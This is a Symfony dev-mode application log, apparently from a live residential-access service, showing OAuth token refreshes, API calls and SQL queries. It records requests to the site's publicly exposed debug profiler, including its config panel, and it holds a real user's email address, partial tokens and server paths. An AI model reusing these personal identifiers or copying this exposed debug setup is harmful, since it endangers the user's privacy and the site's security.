[2025-12-16 19:04:31] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
[2025-12-16 19:04:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=199.45.154.156&limit=10","method":"GET"} []
[2025-12-16 19:04:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=199.45.154.156&limit=10","method":"GET"} []
[2025-12-16 19:05:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d6e5f1","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/d6e5f1?panel=request","method":"GET"} []
[2025-12-16 19:05:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-16 19:09:50] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://www.unda.co/","method":"GET"} []
[2025-12-16 19:10:10] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"6320af","_route":"_wdt"},"request_uri":"https://www.unda.co/_wdt/6320af","method":"GET"} []
[2025-12-16 19:10:59] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0): at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
[2025-12-16 19:11:58] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1d5ef8","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/1d5ef8?panel=request","method":"GET"} []
[2025-12-16 19:11:58] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
[2025-12-16 19:13:02] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
[2025-12-16 19:20:21] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=35.198.60.231&limit=10","method":"GET"} []
[2025-12-16 19:20:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=35.198.60.231&limit=10","method":"GET"} []
[2025-12-16 19:20:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1d5ef8","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/1d5ef8?panel=config","method":"GET"} []
[2025-12-16 19:20:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
[2025-12-16 19:21:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"025fac","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/025fac?panel=events","method":"GET"} []
[2025-12-16 19:21:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=events","method":"GET"} []
[2025-12-16 19:25:18] request.INFO: Matched route "oauth2_token". {"route":"oauth2_token","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\OauthController::tokenAction","domain":"auth.unda.co","_route":"oauth2_token"},"request_uri":"https://auth.unda.co/oauth2/token","method":"POST"} []
[2025-12-16 19:25:18] php.INFO: User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead {"exception":"[object] (ErrorException(code: 0): User Deprecated: getEntityManager is deprecated since Symfony 2.1. Use getManager instead at /var/repositories/hona/vendor/doctrine/doctrine-bundle/Registry.php:62)"} []
[2025-12-16 19:25:18] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM refresh_token t0 WHERE t0.token = ? LIMIT 1 ["119f04a4b23fc92ff69754c3fe [...]"] []
[2025-12-16 19:25:18] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 19:25:18] doctrine.DEBUG: INSERT INTO access_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"fe99f3dd892fa0f7f14cc6ada1 [...]","3":"2025-12-16 19:55:18","4":"","5":398,"6":"[]"} []
[2025-12-16 19:25:18] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 19:25:18] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 19:25:18] doctrine.DEBUG: INSERT INTO refresh_token (client_id, token, expires_at, scope, user_id, data) VALUES (?, ?, ?, ?, ?, ?) {"1":0,"2":"e150f29e1a2b6ef57e5b887f1b [...]","3":"2026-02-14 19:25:18","4":"","5":398,"6":"[]"} []
[2025-12-16 19:25:18] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 19:25:18] doctrine.DEBUG: "START TRANSACTION" [] []
[2025-12-16 19:25:18] doctrine.DEBUG: DELETE FROM refresh_token WHERE client_id = ? AND token = ? [0,"119f04a4b23fc92ff69754c3fe [...]"] []
[2025-12-16 19:25:18] doctrine.DEBUG: "COMMIT" [] []
[2025-12-16 19:25:20] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"10","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/10/0?order=desc","method":"GET"} []
[2025-12-16 19:25:20] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 19:25:20] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-16 19:25:20] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 10 OFFSET 0 [274,1] []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-16 19:25:20] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 19:25:20] request.INFO: Matched route "device_post_uuid". {"route":"device_post_uuid","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\DeviceController::devicePOSTAction","domain":"api.unda.co","_route":"device_post_uuid"},"request_uri":"https://api.unda.co/device","method":"POST"} []
[2025-12-16 19:25:20] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 19:25:20] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-16 19:25:20] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.guid AS guid_6, t0.endpoint_arn AS endpoint_arn_7, t0.token AS token_8, t0.identifier AS identifier_9, t0.model AS model_10, t0.os AS os_11, t0.app_version AS app_version_12, t0.arn_status AS arn_status_13, t0.type AS type_14, t0.app AS app_15, t0.user_id AS user_id_16 FROM device t0 WHERE t0.identifier = ? AND t0.type = ? AND t0.user_id = ? LIMIT 1 ["450EEF16-4822-4D9B-B6A0-EF [...]",1,398] []
[2025-12-16 19:25:20] request.CRITICAL: Uncaught PHP Exception Aws\Sns\Exception\SnsException: "Error executing "CreatePlatformEndpoint" on "https://sns.us-east-1.amazonaws.com"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response: <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/"> <Error> <Type>Sender</Type> <Code>InvalidClie (truncated...) InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns="http://sns.amazonaws.com/doc/2010-03-31/"> <Error> <Type>Sender</Type> <Code>InvalidClientTokenId</Code> <Message>The security token included in the request is invalid.</Message> </Error> <RequestId>ed9a22f2-2e25-5967-be0e-43499a450c0b</RequestId> </ErrorResponse> " at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php line 195 {"exception":"[object] (Aws\\Sns\\Exception\\SnsException(code: 0): Error executing \"CreatePlatformEndpoint\" on \"https://sns.us-east-1.amazonaws.com\"; AWS HTTP error: Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClie (truncated...)\n InvalidClientTokenId (client): The security token included in the request is invalid. - <ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClientTokenId</Code>\n <Message>The security token included in the request is invalid.</Message>\n </Error>\n <RequestId>ed9a22f2-2e25-5967-be0e-43499a450c0b</RequestId>\n</ErrorResponse>\n at /var/repositories/hona/vendor/aws/aws-sdk-php/src/WrappedHttpHandler.php:195, GuzzleHttp\\Exception\\ClientException(code: 403): Client error: `POST https://sns.us-east-1.amazonaws.com` resulted in a `403 Forbidden` response:\n<ErrorResponse xmlns=\"http://sns.amazonaws.com/doc/2010-03-31/\">\n <Error>\n <Type>Sender</Type>\n <Code>InvalidClie (truncated...)\n at /var/repositories/hona/vendor/guzzlehttp/guzzle/src/Exception/RequestException.php:113)"} []
[2025-12-16 19:25:20] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
[2025-12-16 19:25:20] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 19:25:20] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-16 19:25:20] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
[2025-12-16 19:25:20] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
[2025-12-16 19:25:20] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
[2025-12-16 19:25:20] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 19:25:21] request.INFO: Matched route "residential_get_uuid_providers". {"route":"residential_get_uuid_providers","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\ResidentialController::residentialProvidersGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"residential_get_uuid_providers"},"request_uri":"https://api.unda.co/residential/c95c459d-212c-4555-98e9-59cee00445e5/providers","method":"GET"} []
[2025-12-16 19:25:21] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-16 19:25:21] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
[2025-12-16 19:25:21] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-16 19:25:21] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-16 19:25:21] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-16 19:25:21] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 19:25:21] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:21] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:21] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:21] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
[2025-12-16 19:25:21] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-16 19:25:21] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:21] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:21] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:21] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
[2025-12-16 19:25:28] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
[2025-12-16 19:25:28] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["fe99f3dd892fa0f7f14cc6ada1 [...]"] []
[2025-12-16 19:25:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
[2025-12-16 19:25:28] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
[2025-12-16 19:25:28] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
[2025-12-16 19:25:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
[2025-12-16 19:25:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:28] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
[2025-12-16 19:25:28] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
